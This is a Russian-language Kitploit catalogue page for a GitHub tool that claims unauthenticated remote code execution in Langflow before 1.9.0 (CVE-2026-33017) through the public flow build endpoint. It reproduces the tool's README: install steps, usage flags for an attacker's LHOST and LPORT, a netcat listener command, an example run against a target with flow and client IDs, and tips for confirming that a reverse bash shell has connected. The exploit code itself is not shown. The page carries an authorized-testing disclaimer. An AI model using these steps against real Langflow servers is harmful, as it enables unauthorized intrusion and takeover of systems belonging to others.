Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-33017-Exploit — Эксплойт неавторизованного RCE в Langflow <1.9.0 (CVE-2026-33017) | Kitploit
Инструменты/GitHubGitHub/diamorphine666/cve-2026-33017-exploit
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed TeamingИнструмент Удаленного Доступа
GitHubdiamorphine666/cve-2026-33017-exploit

CVE-2026-33017-Exploit

Эксплойт неавторизованного RCE в Langflow <1.9.0 (CVE-2026-33017)

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
1 месяц назадЕщё не проверено

Fireflow RCE Exploit

Удаленное выполнение кода для Langflow через конечную точку build_public_tmp.
Эксплуатация через конечную точку сборки публичного потока, которая выполняет обратную оболочку на целевой системе.

Требования

  • Python 3.8+
  • Библиотека httpx

Установка:

root@kitploit:~
pip install httpx

Использование

root@kitploit:~
python exploit.py -u <BASE_URL> -l <LHOST> -p <LPORT> --flow-id <FLOW_ID> --client-id <CLIENT_ID>

Аргументы

  • -u, --url : Базовый URL экземпляра Langflow (например, https://flow.example.com/)
  • -l, --lhost : Ваш IP-адрес для получения обратной оболочки
  • -p, --lport : Порт прослушивания для обратной оболочки
  • -f --flow-id : ID целевого потока (обязательно – получите из /api/v1/flows/ или через интерфейс)
  • -c --client-id : Значение cookie client_id для идентификации сессии

Пример

  1. Запустите слушатель:

    root@kitploit:~
    nc -nlvp 9001
    
  2. Запустите эксплойт:

    root@kitploit:~
    python exploit.py -u https://flow.target.local/ -l 127.0.0.1 -p 9001 --flow-id 7d84d636-af65-42e4-ac38-26e867052c25 --client-id 8a6bf601-0263-480b-aa81-9a6389ca9e5d
    
  3. В случае успеха вы получите интерактивную оболочку bash.

Важные замечания

  • ReadTimeout является нормальным – сервер может не отвечать, так как оболочка блокирует HTTP-запрос. Если вы видите подключение на вашем слушателе, эксплойт сработал.
  • Требуется валидный flow-id. Получите список всех потоков через GET /api/v1/flows или скопируйте из URL браузера.
  • Этот инструмент предназначен только для авторизованного тестирования на проникновение и образовательных целей. Не используйте его против систем без явного разрешения.

Затронутые версии

  • Версии Langflow до исправления RCE через пользовательские компоненты <1.9.0

Лицензия

MIT – для образовательных и этических исследований в области безопасности.

Скачать инструмент